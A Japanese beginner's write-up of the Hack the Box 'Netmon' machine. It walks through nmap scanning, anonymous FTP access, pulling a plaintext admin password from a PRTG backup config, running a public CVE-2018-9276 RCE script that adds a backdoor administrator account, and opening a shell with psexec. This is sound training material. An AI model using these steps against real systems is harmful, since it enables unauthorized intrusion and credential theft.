【Hack the Box write-up】Netmon

February 24, 2020

はじめに

筆者は Hack the Box 超絶初心者です。 (今回で machine 攻略 3 つ目)

なので、説明ガバガバな部分もあるかと思いますが、何か訂正などありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machineについて

難易度は easy です。(easy の中でもかなり easy) スクリーンショット 2020-02-22 19.52.56.png

nmap

とりあえず nmap します。

[email protected]:~$ nmap -Pn -A 10.10.10.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 05:56 EST
Nmap scan report for 10.10.10.152
Host is up (0.21s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59s, deviation: 0s, median: 59s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-22T10:58:13
|_  start_date: 2020-02-22T09:59:48

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.14 seconds

ftp-anon.nseで詳しく調べる

[email protected]:~$ nmap -Pn --script ftp-anon.nse 10.10.10.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 05:46 EST
Nmap scan report for 10.10.10.152
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 29.73 seconds

anonymous login が可能なことがわかります。

ftpコマンドで接続

[email protected]:~$ ftp 10.10.10.152                                                                                                                                                  
Connected to 10.10.10.152.                                                                                                                                                     
220 Microsoft FTP Service                                                                                                                                                      
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
02-25-19  10:49PM       <DIR>          Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
02-02-19  11:35PM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
02-02-19  11:35PM                   33 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.29 secs (0.1108 kB/s)

user.txt はここで取得できました。

ftp> cd ..
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
02-02-19  11:35PM       <DIR>          Public
226 Transfer complete.
ftp> cd Administrator
550 Access is denied.

admin には入れません。

80番portでブラウザからアクセスしてみる

スクリーンショット 2020-02-22 20.04.33.png このようなページが現れます。

PRTGの本体ファイルを探す

How and where does PRTG store its data? この公式ページとにらめっこしながら探していきます。

[email protected]:~$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd /Users/All Users/Paessler/PRTG Network Monitor
550 The system cannot find the file specified. 
ftp> cd "Users/All Users/Paessler/PRTG Network Monitor"
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-22-20  07:46AM       <DIR>          Configuration Auto-Backups
02-22-20  07:00PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
02-22-20  07:05AM       <DIR>          Logs (Web Server)
02-22-20  07:03PM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
02-22-20  10:27PM              1720806 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.

最終的に見つけたのは Users/All Users/Paessler/PRTG Network Monitor です。

configファイルを落とす

configuration と書いてあるファイルを落とします。

ftp> get "PRTG Configuration.old"
local: PRTG Configuration.old remote: PRTG Configuration.old
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1189697 bytes received in 16.20 secs (71.7122 kB/s)
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 14.99 secs (75.1872 kB/s)
ftp> get "PRTG Configuration.dat"
local: PRTG Configuration.dat remote: PRTG Configuration.dat
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1189697 bytes received in 15.14 secs (76.7473 kB/s)

configファイルの中身を見てみる

以下のすご怪しい記述が PRTG Configuration.old.bak 内で見つかりました。

<dbpassword>
  <!-- User: prtgadmin -->
  [email protected]
</dbpassword>

見つかったpasswordでログインしようとしてみる

しかし、弾かれます。 ここで大詰まりしました。 Netmon こちらの writeup を参照します(あーまた今回も自力で root まで解けなかった。。)

If we try to login with those credentials we’ll notice they don’t work, that’s because the file we retrieved them from was a backup, so they’ve probably changed. We just have to replace the year 2018 with 2019, ending up with prtgadmin / [email protected] which should work and allow us to access the dashboard.

僕が先ほど見ていた PRTG Configuration.old.bak は backup のファイルだったようです。 なので本来の password は変更されている可能性があります。

今回は [email protected][email protected] に変更することでログインに成功します。

ログインすると以下のような画面が表示されます。 スクリーンショット 2020-02-23 13.32.18.png

いい感じのexploitを探す

[email protected]:~$ searchsploit PRTG Network Monitor
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                        |  Path
                                                                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution                                                                  | exploits/windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)                                                              | exploits/windows_x86/dos/44500.py
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

1 つ目を使えたらよかったのですが、version が違いますね。。

色々探していたところ以下の exploit を見つけました。 https://github.com/M4LV0/PRTG-Network-Monitor-RCE

exploitを使う

適当な名前で上記から prtg-exploit.sh をコピペしてきて使用します。

[email protected]:~$ chmod 744 prtg-exploit.sh 
[email protected]:~$ ./prtg-exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"

[+]#########################################################################[+] 
[*] PRTG RCE script by M4LV0                                                [*] 
[+]#########################################################################[+] 
[*] https://github.com/M4LV0                                                [*] 
[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution  CVE-2018-9276 [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and add it to the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'                                                                           

[+]#########################################################################[+] 

 [*] file created 
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st' 
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group 
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!

shellにつなぐ

kali に入っている psexec.py を使用します。

psexec については以下のページが参考になりました。 PsExecを使ってリモートのWindows PC上のプログラムを実行する

[email protected]:/usr/share/doc/python3-impacket/examples$ python3 psexec.py pentest:'P3nT3st!'@10.10.10.152
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file HLrJbIWj.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service OZxS on 10.10.10.152.....
[*] Starting service OZxS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ls
b"'ls' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
C:\Windows\system32>cd ../../User
b'The system cannot find the path specified.\r\n'
C:\Windows\system32>cd ..
 
C:\Windows>cd ..
 
C:\>cd Users
 
C:\Users>cd Administrator
 
C:\Users\Administrator>cd Desktop
 
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 684B-9CE8

 Directory of C:\Users\Administrator\Desktop

02/02/2019  11:35 PM    <DIR>          .
02/02/2019  11:35 PM    <DIR>          ..
02/02/2019  11:35 PM                33 root.txt
               1 File(s)             33 bytes
               2 Dir(s)  12,051,935,232 bytes free

C:\Users\Administrator\Desktop>more root.txt

これで root が取れました!

終わりに

今回は ・password を 2018 から 2019 に変える ・admin のユーザーを作ってから shell にそのユーザーでログインする際に psexec.py を使う という点が思いつかず、他の writeup を参考にしてしまいました。

easy の Box くらいは自力のみで解ききれるようになりたいです。。

このエントリーをはてなブックマークに追加